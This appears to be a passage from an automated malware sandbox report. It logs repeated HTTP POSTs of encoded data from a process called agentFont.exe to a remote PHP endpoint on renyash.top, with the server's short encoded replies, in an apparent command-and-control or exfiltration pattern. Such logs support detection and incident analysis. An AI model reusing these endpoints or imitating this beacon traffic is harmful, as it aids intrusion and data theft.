                                                                                  Data Ascii: QPX\TDP]Y_[RZYYPUTT\Q_[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+#-/1-D9.;T%Y.]3!!"'Y!W)'$"%X+&X"#\.$
                                                                                  Jan 1, 2025 11:28:36.431828022 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:36.563802958 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  100192.168.2.450079185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:36.731296062 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:37.080960989 CET1040OUTData Raw: 54 53 5d 5b 51 44 50 5a 59 5f 5b 52 5a 5a 59 50 55 51 54 58 51 5f 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TS][QDPZY_[RZZYPUQTXQ_[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.(1%U#=2=.>,$?-'<%!5-$)4866?:&X"#\.<
                                                                                  Jan 1, 2025 11:28:37.365361929 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:37.493591070 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  101192.168.2.450089185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:37.690449953 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:38.050374031 CET1044OUTData Raw: 54 5b 58 5c 54 42 55 51 59 5f 5b 52 5a 5d 59 55 55 5e 54 5a 51 59 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[X\TBUQY_[RZ]YUU^TZQY[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\("78&:[71<%$<6Y#%3=W*#[">!):&X"#\.
                                                                                  Jan 1, 2025 11:28:38.324080944 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:38.453495979 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  102192.168.2.450095185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:38.581681013 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  103192.168.2.450096185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:38.743269920 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:39.096605062 CET1340OUTData Raw: 51 56 5d 5d 54 41 50 5d 59 5f 5b 52 5a 5f 59 55 55 5e 54 59 51 5c 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QV]]TAP]Y_[RZ_YUU^TYQ\[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(& [ Y2=5--#&?)')!=V3-R)["<&X"#\.<
                                                                                  Jan 1, 2025 11:28:39.374566078 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:39.502769947 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:35 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 27 5f 3d 26 33 5a 25 3b 0f 50 24 2e 27 12 2b 20 2a 59 3b 12 25 5b 26 3a 2b 06 3c 20 3f 50 3f 02 2a 58 3f 3d 34 5d 25 0c 0e 55 26 0f 2a 51 00 1c 23 13 3f 02 33 13 28 06 3e 54 3d 0f 24 05 3c 3f 3c 00 36 2a 09 56 30 05 2d 0f 24 13 2c 04 3c 3c 2b 0e 3b 0b 24 07 38 1d 01 58 27 26 2f 52 09 14 22 03 29 55 38 09 26 0b 3d 01 24 56 3c 00 22 38 30 0f 37 54 21 54 34 23 23 59 28 2d 2b 59 35 31 25 01 26 3c 03 19 28 3e 20 0a 21 2e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: '_=&3Z%;P$.'+ *Y;%[&:+< ?P?*X?=4]%U&*Q#?3(>T=$<?<6*V0-$,<<+;$8X'&/R")U8&=$V<"807T!T4##Y(-+Y51%&<(> !.#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  104192.168.2.450097185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:38.874849081 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:39.221731901 CET1044OUTData Raw: 54 52 5d 59 51 43 55 5b 59 5f 5b 52 5a 58 59 57 55 5e 54 5d 51 58 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TR]YQCU[Y_[RZXYWU^T]QX[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.<"T"-'%!:+1"]366=W',")[6=](*&X"#\.
                                                                                  Jan 1, 2025 11:28:39.515398979 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:39.642832994 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  105192.168.2.450103185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:39.908104897 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:40.252862930 CET1044OUTData Raw: 54 50 5d 5a 54 4a 55 5f 59 5f 5b 52 5a 5b 59 5d 55 52 54 5a 51 5b 5b 5f 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TP]ZTJU_Y_[RZ[Y]URTZQ[[_^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(R7= Z&=%.T$<2\$)#&%U$?2)4,"=_?&X"#\.,
                                                                                  Jan 1, 2025 11:28:40.542334080 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:40.669621944 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  106192.168.2.450109185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:40.800342083 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:41.159135103 CET1044OUTData Raw: 54 53 58 5b 54 42 55 59 59 5f 5b 52 5a 5f 59 57 55 51 54 5d 51 5b 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TSX[TBUYY_[RZ_YWUQT]Q[[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.(T7.'26D,.(&"'<.X5C"3?S=$ 59X<*&X"#\.<
                                                                                  Jan 1, 2025 11:28:41.455328941 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:41.589824915 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:38 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  107192.168.2.450110185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:41.723268032 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:42.080957890 CET1044OUTData Raw: 51 55 58 59 54 47 55 5f 59 5f 5b 52 5a 5f 59 5c 55 5f 54 5f 51 5c 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QUXYTGU_Y_[RZ_Y\U_T_Q\[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\?2> +199;W1>_3-"%P')*4+\#-<:&X"#\.<
                                                                                  Jan 1, 2025 11:28:42.368954897 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:42.503799915 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:38 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  108192.168.2.450111185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:42.630732059 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:42.987246990 CET1040OUTData Raw: 51 52 5d 5a 51 44 50 5d 59 5f 5b 52 5a 5a 59 54 55 52 54 59 51 5f 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QR]ZQDP]Y_[RZZYTURTYQ_[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(4&:B-#&>%<.[61T31S*4$5["):&X"#\.,
                                                                                  Jan 1, 2025 11:28:43.266748905 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:43.394083977 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  109192.168.2.450112185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:43.521506071 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:43.877931118 CET1044OUTData Raw: 54 5a 5d 53 51 47 50 5e 59 5f 5b 52 5a 59 59 50 55 5e 54 59 51 5d 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TZ]SQGP^Y_[RZYYPU^TYQ][X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?9W4=[1->B:=;U%<1'Z9651$/='6-Y(*&X"#\.$
                                                                                  Jan 1, 2025 11:28:44.168078899 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:44.300147057 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:40 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  110192.168.2.450113185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:44.429126024 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  111192.168.2.450114185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:44.524600983 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:44.877814054 CET1340OUTData Raw: 51 52 58 59 51 43 50 5a 59 5f 5b 52 5a 5e 59 5c 55 5e 54 5b 51 5a 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QRXYQCPZY_[RZ^Y\U^T[QZ[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.[(2.">+1>&D:W%?Y',.X"-Q$?=>''6=1+*&X"#\.8
                                                                                  Jan 1, 2025 11:28:45.160754919 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:45.293951035 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 24 00 3d 36 37 11 24 5d 25 57 33 2d 33 12 28 30 2a 11 2f 2c 22 03 26 29 3f 01 2b 23 0a 09 3f 2b 35 07 3c 13 30 5a 31 0c 3c 51 32 35 2a 51 00 1c 23 5a 3c 28 3b 59 3c 3b 36 55 2a 22 37 17 28 12 19 12 36 04 02 0e 24 3b 3e 53 25 3e 37 5d 2b 06 2c 1d 3b 26 34 07 2f 30 30 00 24 1c 2f 52 09 14 21 5c 29 55 3b 13 25 0b 21 03 27 23 3b 11 36 16 02 0e 37 32 2d 12 37 33 02 01 3c 04 34 01 21 1f 08 58 31 2c 22 41 3f 03 27 52 22 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: $=67$]%W3-3(0*/,"&)?+#?+5<0Z1<Q25*Q#Z<(;Y<;6U*"7(6$;>S%>7]+,;&4/00$/R!\)U;%!'#;672-73<4!X1,"A?'R">#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  112192.168.2.450115185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:44.692301035 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:45.049776077 CET1044OUTData Raw: 51 51 58 58 54 41 55 5c 59 5f 5b 52 5a 58 59 52 55 5f 54 5c 51 5b 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQXXTAU\Y_[RZXYRU_T\Q[[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.?T5#/2%-;U%/0"_"%!U$=3Z5&(*&X"#\.
                                                                                  Jan 1, 2025 11:28:45.338648081 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:45.472076893 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  113192.168.2.450116185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:45.599981070 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:45.956048012 CET1040OUTData Raw: 54 52 5d 5c 51 47 55 5c 59 5f 5b 52 5a 5a 59 51 55 52 54 50 51 5f 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TR]\QGU\Y_[RZZYQURTPQ_[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<2= > Y$>5982$Z*"6-Q$/-)$,#=9\):&X"#\.8
                                                                                  Jan 1, 2025 11:28:46.246614933 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:46.376025915 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  114192.168.2.450117185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
